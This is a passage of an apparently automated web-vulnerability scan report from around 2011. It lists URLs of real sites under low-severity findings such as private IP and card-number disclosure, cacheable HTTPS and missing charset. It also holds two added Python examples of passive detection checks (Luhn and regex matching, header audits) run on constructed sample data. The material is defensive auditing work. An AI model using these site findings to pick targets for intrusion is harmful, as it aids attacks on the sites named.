22.39. http://www.capitalone.com/css/framework/base.css

22.40. http://www.capitalone.com/css/framework/grid.css

22.41. http://www.capitalone.com/css/framework/print.css

22.42. http://www.capitalone.com/css/header.css

22.43. http://www.capitalone.com/css/page-nav-heading.css

22.44. http://www.capitalone.com/scripts/https-common/jquery/tooltip/bgiframe.js

22.45. https://www.capitalone.com/css/footer.css

22.46. https://www.capitalone.com/css/framework/base.css

22.47. https://www.capitalone.com/css/framework/grid.css

22.48. https://www.capitalone.com/css/framework/print.css

22.49. https://www.capitalone.com/css/header.css

22.50. https://www.capitalone.com/css/page-nav-heading.css

22.51. https://www.capitalone.com/css/page-type/homepage.css

22.52. http://www.google.com/search

22.53. https://www.google.com/accounts/ServiceLogin

22.54. http://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx

22.55. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx

22.56. http://www.lifescript.com/Health/Conditions/ADD/Out_of_Control_It_Could_Be_ADHD.aspx

22.57. http://www.lifescript.com/js/jquery.innerfade.js

22.58. http://www.observer.com/

22.59. http://www.paloaltonetworks.com/js/plugins/jquery.colorbox.js

22.60. http://www.scmagazineus.com/

22.61. http://www.silverpop.com/Scripts/new-banners.js

22.62. http://www.silverpop.com/preferences_sf/preferences_sf.js.php

22.63. http://www.treehugger.com/h-code.js

22.64. http://www.treehugger.com/scripts/colorbox/jquery.colorbox.js

22.65. http://www.vostu.com/en/

22.66. http://www.vostu.com/en/2011/04/20/megacity-takes-brazil-by-storm/

22.67. http://www.vostu.com/en/news/

23. Private IP addresses disclosed

23.1. http://api.facebook.com/restserver.php

23.2. http://api.facebook.com/restserver.php

23.3. http://api.facebook.com/restserver.php

23.4. http://api.facebook.com/restserver.php

23.5. http://api.facebook.com/restserver.php

23.6. http://api.facebook.com/restserver.php

23.7. http://assets.0.mybcdna.com//images/HomeBeforeLogin/btn_sign_up_free.png

23.8. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

23.9. http://assets.0.mybcdna.com/images/games/tiles/19_medium.gif

23.10. http://assets.0.mybcdna.com/images/games/tiles/57_medium.gif

23.11. http://assets.2.mybcdna.com//images/favicon.ico

23.12. http://assets.2.mybcdna.com/css/apps/HomeBeforeLogin/hblv2.css

23.13. http://assets.2.mybcdna.com/images/Connect/hbl_login_divider.png

23.14. http://assets.2.mybcdna.com/images/HomeBeforeLogin/background_content.png

23.15. http://assets.2.mybcdna.com/images/HomeBeforeLogin/feed_logos.png

23.16. http://assets.2.mybcdna.com/images/HomeBeforeLogin/feed_nav_icons.png

23.17. http://assets.2.mybcdna.com/images/HomeBeforeLogin/login_button.png

23.18. http://assets.2.mybcdna.com/images/Navbar/nav_sprite_default.png

23.19. http://assets.2.mybcdna.com/images/games/tiles/81_medium.gif

23.20. http://assets.2.mybcdna.com/images/gradient_sprite.png

23.21. http://assets.2.mybcdna.com/images/header_sprite.png

23.22. http://assets.3.mybcdna.com/images/PremiumGifts/pg_wrap2_orange.jpg

23.23. http://assets.5.mybcdna.com/images/PremiumGifts/pg_wrap2_summer2.jpg

23.24. http://assets.6.mybcdna.com/images/games/tiles/30_medium.gif

23.25. http://assets.myyearbook.com/images/games/partnerAds/fourplay.png

23.26. http://assets.myyearbook.com/nerve/css/nerve.css

23.27. http://assets.myyearbook.com/nerve/js/nerve.js

23.28. http://ch2lb.checkm8.com/adam/cm8_detect_ad.js

23.29. http://ch2lb.checkm8.com/data/420913/presitial_SC_logo.gif

23.30. http://ch2lb.checkm8.com/data/442707/Nom_640x480.gif

23.31. http://connect.facebook.net/en_US/all.js

23.32. http://connect.facebook.net/en_US/all.js

23.33. http://connect.facebook.net/en_US/all.js

23.34. http://connect.facebook.net/en_US/all.js

23.35. http://connect.facebook.net/en_US/all.js

23.36. http://games.myyearbook.com/

23.37. http://games.myyearbook.com/landing/pool

23.38. http://home.myyearbook.com/Countries

23.39. http://home.myyearbook.com/favicon.ico

23.40. http://home.myyearbook.com/feed/giftFeedItems

23.41. http://home.myyearbook.com/feed/myMagFeedItems

23.42. http://home.myyearbook.com/feed/tvFeedItems

23.43. http://myyearbook.com/

23.44. http://player.vimeo.com/video/18305022

23.45. http://player.vimeo.com/video/25752549

23.46. http://player.vimeo.com/video/25752549

23.47. http://player.vimeo.com/video/26341323

23.48. http://player.vimeo.com/video/8022406

23.49. http://player.vimeo.com/video/8022406

23.50. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif

23.51. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif

23.52. http://research.microsoft.com/en-us/

23.53. http://research.microsoft.com/en-us/downloads/cecba376-3d3f-4eaf-bf01-20983857c2b1/default.aspx

23.54. http://research.microsoft.com/en-us/events/fs2011/default.aspx

23.55. http://research.microsoft.com/en-us/events/fs2011/demofest.aspx

23.56. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

23.57. http://static.ak.fbcdn.net/connect.php/css/share-button-css

23.58. http://static.ak.fbcdn.net/connect.php/js/FB.Share

23.59. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.60. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.61. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.62. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.63. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.64. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.65. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.66. http://static.ak.fbcdn.net/images/connect_sprite.png

23.67. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js

23.68. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/C0OtqEd7THh.css

23.69. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/hzcsbK-GAuH.css

23.70. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js

23.71. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/v3AaEMJaNiA.js

23.72. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js

23.73. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/yGAzEWR0-5b.js

23.74. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/JSqaF4G1Vob.css

23.75. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css

23.76. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/AI7cvamOOjQ.css

23.77. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/mfm5LaL5Ify.css

23.78. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/znpKCeUuNfm.css

23.79. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/znpKCeUuNfm.css

23.80. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css

23.81. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/AQsou8r87UO.js

23.82. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/vgIBfPxn_gJ.css

23.83. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/ay94DQdlwaE.js

23.84. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css

23.85. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css

23.86. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/myfphzY3EFO.js

23.87. http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js

23.88. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

23.89. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js

23.90. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/jsZvfR86-A1.js

23.91. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/jsZvfR86-A1.js

23.92. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png

23.93. http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/FGFbc80dUKj.png

23.94. http://static.ak.fbcdn.net/rsrc.php/v1/zN/r/BAsr4eOOsw6.png

23.95. http://static.ak.fbcdn.net/rsrc.php/v1/zW/r/0t0iUYDtV0L.png

23.96. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

23.97. http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/_IKHHfAgFQe.png

23.98. http://static.ak.fbcdn.net/rsrc.php/v1/zj/r/FSEB6oLTK3I.png

23.99. http://takeover.myyearbook.com/6443/main_image.jpg

23.100. http://web2.checkm8.com/adam/detect

23.101. http://web2.checkm8.com/adam/em/ad_play/442707/cat=47183/uhook=6DF1BDD4075B/criterias=32_0_43_3_103_18_104_12_116_225_117_225045_118_1_120_4000000100_122_4225045100_280_22_282_0_283_0_/ord=8851318688487949

23.102. http://web2.checkm8.com/dispatcher_scripts/browserDataDetect.js

23.103. http://www.facebook.com/connect/connect.php

23.104. http://www.facebook.com/connect/connect.php

23.105. http://www.facebook.com/connect/connect.php

23.106. http://www.facebook.com/connect/connect.php

23.107. http://www.facebook.com/extern/login_status.php

23.108. http://www.facebook.com/extern/login_status.php

23.109. http://www.facebook.com/extern/login_status.php

23.110. http://www.facebook.com/extern/login_status.php

23.111. http://www.facebook.com/extern/login_status.php

23.112. http://www.facebook.com/extern/login_status.php

23.113. http://www.facebook.com/extern/login_status.php

23.114. http://www.facebook.com/extern/login_status.php

23.115. http://www.facebook.com/extern/login_status.php

23.116. http://www.facebook.com/extern/login_status.php

23.117. http://www.facebook.com/plugins/comments.php

23.118. http://www.facebook.com/plugins/comments.php

23.119. http://www.facebook.com/plugins/comments.php

23.120. http://www.facebook.com/plugins/comments.php

23.121. http://www.facebook.com/plugins/comments.php

23.122. http://www.facebook.com/plugins/comments.php

23.123. http://www.facebook.com/plugins/comments.php

23.124. http://www.facebook.com/plugins/comments.php

23.125. http://www.facebook.com/plugins/comments.php

23.126. http://www.facebook.com/plugins/comments.php

23.127. http://www.facebook.com/plugins/comments.php

23.128. http://www.facebook.com/plugins/comments.php

23.129. http://www.facebook.com/plugins/comments.php

23.130. http://www.facebook.com/plugins/comments.php

23.131. http://www.facebook.com/plugins/comments.php

23.132. http://www.facebook.com/plugins/comments.php

23.133. http://www.facebook.com/plugins/comments.php

23.134. http://www.facebook.com/plugins/comments.php

23.135. http://www.facebook.com/plugins/comments.php

23.136. http://www.facebook.com/plugins/comments.php

23.137. http://www.facebook.com/plugins/comments.php

23.138. http://www.facebook.com/plugins/comments.php

23.139. http://www.facebook.com/plugins/comments.php

23.140. http://www.facebook.com/plugins/comments.php

23.141. http://www.facebook.com/plugins/comments.php

23.142. http://www.facebook.com/plugins/fan.php

23.143. http://www.facebook.com/plugins/like.php

23.144. http://www.facebook.com/plugins/like.php

23.145. http://www.facebook.com/plugins/like.php

23.146. http://www.facebook.com/plugins/like.php

23.147. http://www.facebook.com/plugins/like.php

23.148. http://www.facebook.com/plugins/like.php

23.149. http://www.facebook.com/plugins/like.php

23.150. http://www.facebook.com/plugins/like.php

23.151. http://www.facebook.com/plugins/like.php

23.152. http://www.facebook.com/plugins/like.php

23.153. http://www.facebook.com/plugins/like.php

23.154. http://www.facebook.com/plugins/like.php

23.155. http://www.facebook.com/plugins/like.php

23.156. http://www.facebook.com/plugins/like.php

23.157. http://www.facebook.com/plugins/like.php

23.158. http://www.facebook.com/plugins/like.php

23.159. http://www.facebook.com/plugins/like.php

23.160. http://www.facebook.com/plugins/like.php

23.161. http://www.facebook.com/plugins/like.php

23.162. http://www.facebook.com/plugins/like.php

23.163. http://www.facebook.com/plugins/like.php

23.164. http://www.facebook.com/plugins/like.php

23.165. http://www.facebook.com/plugins/like.php

23.166. http://www.facebook.com/plugins/like.php

23.167. http://www.facebook.com/plugins/like.php

23.168. http://www.facebook.com/plugins/like.php

23.169. http://www.facebook.com/plugins/like.php

23.170. http://www.facebook.com/plugins/like.php

23.171. http://www.facebook.com/plugins/likebox.php

23.172. http://www.facebook.com/plugins/likebox.php

23.173. http://www.facebook.com/plugins/likebox.php

23.174. http://www.facebook.com/plugins/likebox.php

23.175. http://www.google.com/sdch/StnTz5pY.dct

23.176. http://www.myyearbook.com/advertising/default.php

23.177. http://www.myyearbook.com/advertising/default.php

23.178. http://www.myyearbook.com/advertising/default.php

23.179. http://www.myyearbook.com/favicon.ico

23.180. http://www.myyearbook.com/favicon.ico

23.181. http://www.myyearbook.com/favicon.ico

23.182. http://www.myyearbook.com/favicon.ico

23.183. http://www.myyearbook.com/favicon.ico

24. Credit card numbers disclosed

24.1. http://greatponds.squarespace.com/universal/scripts/squarespace-gallery-slideshow.js

24.2. http://rad.msn.com/ADSAdClient31.dll

24.3. http://www.bing.com/search

24.4. http://www.greatpondsma.org/universal/scripts/squarespace-gallery-slideshow.js

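Sections 22, 23 and 24 are passive pattern matches over response bodies: an e-mail regex, an IPv4 regex filtered to private ranges, and digit runs that pass the Luhn mod-10 check. The code below is an added example for this page, not the scanner's own logic; the JavaScript body it scans is constructed, and the `example.com` address, the `10.0.3.21` host and the `4111111111111111` test PAN in it are made-up values. It shows why "Credit card numbers disclosed" on a static script needs manual confirmation: any 13-19 digit run has roughly a one-in-ten chance of passing Luhn, so a build number or timestamp can trigger the finding, and a version string such as `1.3.4.0` looks like an IPv4 address until the range filter drops it.

```python
"""Passive disclosure checks: e-mail addresses, RFC 1918 IPs, Luhn-valid numbers."""
import ipaddress
import re
from typing import Dict, List

EMAIL_RE = re.compile(r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# 13-19 digits, optionally separated by spaces or dashes, as cards are printed.
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")

# RFC 1918 plus loopback and link-local; checked explicitly rather than via
# ip.is_private, which also covers documentation ranges such as 203.0.113.0/24.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def luhn_valid(digits: str) -> bool:
    """Luhn mod-10 check over a digit string (what scanners use to rank card hits)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def private_ips(text: str) -> List[str]:
    """Private-range addresses found in the text; version strings fall out here."""
    hits = []
    for m in IPV4_RE.findall(text):
        try:
            ip = ipaddress.ip_address(m)
        except ValueError:
            continue            # e.g. 999.1.1.1 matched the regex but is not an address
        if any(ip in net for net in PRIVATE_NETS):
            hits.append(m)
    return hits


def card_candidates(text: str) -> List[str]:
    """Digit runs that pass Luhn.  Treat a hit in a static script as a lead, not proof."""
    hits = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            hits.append(digits)
    return hits


def scan_body(text: str) -> Dict[str, List[str]]:
    """Run all three passive checks over one response body."""
    return {
        "emails": EMAIL_RE.findall(text),
        "private_ips": private_ips(text),
        "cards": card_candidates(text),
    }


# Constructed sample body (not taken from any site in this report).
SAMPLE_JS = """
// build 4111111111111111  (a well-known test PAN; passes Luhn)
var backend = "http://10.0.3.21:8080/api"; var cdn = "http://93.184.216.34/";
var contact = "ops@example.com"; var build = "2011072312345";
"""

if __name__ == "__main__":
    print(scan_body(SAMPLE_JS))
```

Of the two 13+ digit runs in the sample, only the test PAN survives the Luhn filter; the build number is the kind of value that a scanner reports as a card when its Luhn sum happens to land on zero, which is why each "Credit card numbers disclosed" entry should be opened and read before it goes into a report.
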
25. Robots.txt file

25.1. http://204.124.80.52/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

25.2. http://ad.doubleclick.net/activity

25.3. http://altfarm.mediaplex.com/ad/js/16024-128483-16880-2

25.4. http://analytics.spongecell.com/placements/47958921

25.5. http://api.facebook.com/restserver.php

25.6. http://cheetah.vizu.com/f.gif

25.7. http://clk.atdmt.com/goiframe/223672189/334126009/direct

25.8. https://code.google.com/p/domsnitch/downloads/list

25.9. http://community.spiceworks.com/r/595

25.10. http://dinclinx.com/

25.11. http://feeds.bbci.co.uk/news/rss.xml

25.12. http://fls.doubleclick.net/activityi

25.13. http://forums-test.vostu.com/clientscript/ncode_imageresizer.js

25.14. http://go.microsoft.com/fwlink/

25.15. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071724218/

25.16. http://haymarketbusinesspublications.122.2o7.net/b/ss/haymarketscmagazineus,haymarketusglobal/1/H.21/s25559028366202

25.17. http://i.microsoft.com/en-us/homepage/bimapping.js

25.18. http://i3.microsoft.com/library/svy/broker-config_s1.js

25.19. http://images.apple.com/support/expresslane/data/properties.json

25.20. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js

25.21. http://jlinks.industrybrains.com/jsct

25.22. http://l.addthiscdn.com/live/t00/152lo.gif

25.23. http://metrics.apple.com/b/ss/appleglobal,applehome/1/H.22.1/s45228154349606

25.24. http://mm.chitika.net/minimall

25.25. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

25.26. http://pagead2.googlesyndication.com/pagead/imgad

25.27. http://paid.outbrain.com/favicon.ico

25.28. http://pixel.everesttech.net/2368/gr

25.29. http://pixel1350.everesttech.net/1350/p

25.30. http://pshared.5min.com/Scripts/ThumbSeed2.Style.js

25.31. http://pubads.g.doubleclick.net/gampad/ads

25.32. http://puma.vizu.com/cdn/00/00/22/09/smart_tag.js

25.33. http://rad.msn.com/ADSAdClient31.dll

25.34. http://s7.addthis.com/static/r07/sh46.html

25.35. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYlrYDIJq2AyoFF9sAAA8yBRbbAAAB

25.36. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.37. http://tag.admeld.com/ad/js/785/lifescript/728x90/ros

25.38. http://web2.checkm8.com/adam/detect

25.39. http://www.apple.com/

25.40. http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/

25.41. http://www.datacard.com/

25.42. http://www.facebook.com/plugins/likebox.php

25.43. http://www.google-analytics.com/__utm.gif

25.44. http://www.googleadservices.com/pagead/conversion/1071724218/

25.45. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx

25.46. http://www.microsoft.com/en-us/security_essentials/default.aspx

25.47. http://www.observer.com/wp-content/themes/nyo_tech/js/global.js

25.48. http://www.paloaltonetworks.com/cam/switch/index.php

25.49. http://www.righthealth.com/external/ads/clo.gif

25.50. http://www.scmagazineus.com/

25.51. http://www.walmartlabs.com/

26. Cacheable HTTPS response

26.1. https://acn-members.apple.com/mo_login/login.lasso

26.2. https://domsnitch.googlecode.com/files/v0.707.crx

26.3. https://towernet.capitalonebank.com/loginpage.html

26.4. https://towernet.capitalonebank.com/whatis.html

27. Multiple content types specified

28. HTML does not specify charset

28.1. http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3

28.2. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225

28.3. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225.2

28.4. http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3

28.5. http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33

28.6. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10

28.7. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11

28.8. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12

28.9. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16

28.10. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17

28.11. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel

28.12. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story

28.13. http://ads.pointroll.com/PortalServe/

28.14. http://amch.questionmarket.com/adscgen/st.php

28.15. http://analytics.microsoft.com/Sync.html

28.16. http://analytics.msn.com/Include.html

28.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.18. http://ds.addthis.com/red/psi/sites/www.seashepherd.org/p.json

28.19. http://fls.doubleclick.net/activityi

28.20. http://load.exelator.com/load/

28.21. http://mediacdn.disqus.com/1311185431/build/system/def.html

28.22. http://mediacdn.disqus.com/1311185431/build/system/facebook.html

28.23. http://mediacdn.disqus.com/1311382870/build/system/def.html

28.24. http://mediacdn.disqus.com/1311382870/build/system/reply.html

28.25. http://mediacdn.disqus.com/1311382870/build/system/upload.html

28.26. http://odb.outbrain.com/utils/ping.html

28.27. http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html

28.28. http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

28.29. http://scripts.chitika.net/static/hq/lifescript.js

28.30. https://servicing.capitalone.com/favicon.ico

28.31. http://showadsak.pubmatic.com/AdServer/AdServerServlet

28.32. http://static.addtoany.com/menu/sm3.html

28.33. http://support.klout.com/

28.34. http://support.klout.com/favicon.ico

28.35. http://switch.atdmt.com/jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4

28.36. http://switch.atdmt.com/jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4

28.37. http://switch.atdmt.com/jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4

28.38. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220

28.39. http://trk.etrigue.com/track.php

28.40. http://w55c.net/ct/cms-2-frame.html

28.41. http://web2.checkm8.com/adam/detect

28.42. http://www.boston.com/newsprojects/widgets/twitter/get_tweet_count.php

28.43. http://www.everestjs.net/static/ad_if_c.html

28.44. http://www.hitcon.org/hit2011/

28.45. http://www.hitcon.org/hit2011/download.html

28.46. http://www.lifescript.com/adcontrol.htm

28.47. http://www.lifescript.com/html/comScore.htm

28.48. http://www.nmmlaw.com/templates/nmm_2011/images/bg/spacer4.jpg

28.49. http://www.seashepherd.org/

28.50. http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263

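"Cacheable HTTPS response" (section 26) and "HTML does not specify charset" (section 28) are both header-level observations. The checks below are an added example written for this page, not the scanner's own rules; the four sample responses and the `bank.example`, `ads.example` and `static.example` hosts are constructed. The cache verdict is deliberately three-valued: `Cache-Control: private` stops shared caches but not the browser cache on a shared workstation, and `no-cache` still allows storage subject to revalidation, so only `no-store` is reported as fully handled. The charset check accepts a declaration in either the Content-Type header or a `<meta>` tag, since a response with neither leaves the encoding to browser sniffing.

```python
"""Passive header checks: cacheable HTTPS responses and HTML without a charset."""
import re
from typing import Dict, List, Optional

META_CHARSET_RE = re.compile(r"<meta[^>]*charset\s*=\s*[\"']?([\w-]+)", re.IGNORECASE)


def _lower_keys(headers: Dict[str, str]) -> Dict[str, str]:
    return {k.lower(): v for k, v in headers.items()}


def https_cache_verdict(url: str, headers: Dict[str, str]) -> Optional[str]:
    """None for http:// URLs; otherwise 'ok' (no-store present), 'weak' (only
    no-cache / private / Pragma), or 'cacheable' (nothing stops caching)."""
    if not url.lower().startswith("https://"):
        return None
    h = _lower_keys(headers)
    directives = {d.strip() for d in h.get("cache-control", "").lower().split(",")}
    if "no-store" in directives:
        return "ok"
    if directives & {"no-cache", "private"} or "no-cache" in h.get("pragma", "").lower():
        return "weak"
    return "cacheable"


def charset_missing(headers: Dict[str, str], body: str) -> bool:
    """True for an HTML response that declares no charset in the Content-Type
    header or in a <meta> tag; non-HTML responses are never flagged."""
    ctype = _lower_keys(headers).get("content-type", "").lower()
    if not ctype.startswith("text/html"):
        return False
    if "charset=" in ctype:
        return False
    return META_CHARSET_RE.search(body) is None


def audit(samples) -> List[Dict[str, object]]:
    """Apply both checks to (url, headers, body) triples."""
    return [
        {"url": url,
         "cache": https_cache_verdict(url, headers),
         "charset_missing": charset_missing(headers, body)}
        for url, headers, body in samples
    ]


# Constructed sample responses (not captured from any host in this report).
SAMPLES = [
    ("https://bank.example/login",
     {"Content-Type": "text/html", "Cache-Control": "private"},
     "<html><body>Login</body></html>"),
    ("https://bank.example/app",
     {"Content-Type": "text/html; charset=utf-8",
      "Cache-Control": "no-store, no-cache", "Pragma": "no-cache"},
     "<html><body>Account</body></html>"),
    ("http://ads.example/frame",
     {"Content-Type": "text/html"},
     '<html><head><meta charset="utf-8"></head><body></body></html>'),
    ("https://static.example/favicon.ico",
     {"Content-Type": "image/x-icon"},
     ""),
]

if __name__ == "__main__":
    for row in audit(SAMPLES):
        print(row)
```

Static assets such as the favicon above are expected to be cacheable, so a "cacheable" verdict matters only on pages that carry account data or session-specific content; the login page with `private` alone is the case worth raising.
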
29. Content type incorrectly stated

29.1. http://a.rad.msn.com/ADSAdClient31.dll

29.2. http://a1.interclick.com/getInPageJS.aspx

29.3. http://a1.interclick.com/getInPageJSProcess.aspx

29.4. http://adadvisor.net/adscores/g.js

29.5. http://ads.adap.tv/beacons

29.6. http://ads.pointroll.com/PortalServe/

29.7. http://aka-cdn-ns.adtechus.com/apps/160/Ad1840288St3Sz154Sq20383166V2Id2/E-160x600.jpg

29.8. http://aka-cdn-ns.adtechus.com/apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile1.js

29.9. http://amch.questionmarket.com/adscgen/st.php

29.10. http://articleonepartners.app7.hubspot.com/salog.js.aspx

29.11. http://attributiontrackingga.googlecode.com/svn/trunk/distilled.FirstTouch.js

29.12. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard

29.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

29.14. http://cache.boston.com/universal/js/sitelife/DirectProxy

29.15. http://cache.boston.com/universal/js/sitelife/SiteLifeProxy

29.16. http://cache.boston.com/universal/js/sitelife/SiteLifeScripts

29.17. http://catrg.peer39.net/443/131/66315943

29.18. http://consultants-locator.apple.com/favicon.ico

29.19. http://consultants-locator.apple.com/javascript/fancybox/jquery.fancybox-1.3.4.js

29.20. http://consultants-locator.apple.com/javascript/formatDate.js

29.21. http://consultants-locator.apple.com/javascript/jquery.js

29.22. http://consultants-locator.apple.com/javascript/jquery.tools.min.js

29.23. http://consultants-locator.apple.com/javascript/portal.1309219793.js

29.24. http://consultants-locator.apple.com/javascript/tooltips.js

29.25. http://consultants-locator.apple.com/javascript/treeview/treeview-min.js

29.26. http://consultants-locator.apple.com/javascript/wick.1295053156.js

29.27. http://consultants-locator.apple.com/javascript/yui/accordionview.js

29.28. http://consultants-locator.apple.com/javascript/yui/animation.js

29.29. http://consultants-locator.apple.com/javascript/yui/connection.1287529288.js

29.30. http://consultants-locator.apple.com/javascript/yui/container.1287529288.js

29.31. http://consultants-locator.apple.com/javascript/yui/dom.1287529288.js

29.32. http://consultants-locator.apple.com/javascript/yui/event.1287529288.js

29.33. http://consultants-locator.apple.com/javascript/yui/json.js

29.34. http://consultants-locator.apple.com/javascript/yui/utilities.js

29.35. http://consultants-locator.apple.com/javascript/yui/yahoo.1287529288.js

29.36. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png

29.37. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png

29.38. http://event.adxpose.com/event.flow

29.39. http://geek.net/favicon.ico

29.40. http://go.ionearth.com/sites/all/themes/ionearth_base/js/cufon/cufon-replace.js

29.41. http://hipservice.live.com/gethip.srf

29.42. http://i3.silverlight.net/css/main.css

29.43. http://images.apple.com/global/nav/scripts/globalnav.js

29.44. http://images.apple.com/support/expresslane/data/properties.json

29.45. http://images.lifescript.com/images/button/sign-up.gif

29.46. http://images.lifescript.com/images/menu/subnavslice.gif

29.47. http://km.support.apple.com/kb/resources/js/ACShortcuts.js

29.48. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

29.49. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

29.50. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

29.51. http://mediacdn.disqus.com/1311382870/fonts/disqus-webfont.woff

29.52. http://my.seashepherd.org/NetCommunity/view.image

29.53. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html

29.54. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/banner_01.gif

29.55. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/header_timeout.jpg

29.56. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/vs_img.gif

29.57. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/images/banner_02.gif

29.58. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/images/banner_bg.gif

29.75. http://rad.msn.com/ADSAdClient31.dll

29.76. http://rt.disqus.com/forums/realtime-cached.js

29.77. http://scripts.chitika.net/static/hq/lifescript.js

29.78. https://servicing.capitalone.com/C1/Themes/TopTabMenu/Images/Marketing/Ban_IPOS.gif

29.79. https://servicing.capitalone.com/C1/Themes/TopTabMenu/images/header_bg.gif

29.80. http://showadsak.pubmatic.com/AdServer/AdServerServlet

29.81. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

29.82. http://sr2.liveperson.net/hcp/html/mTag.js

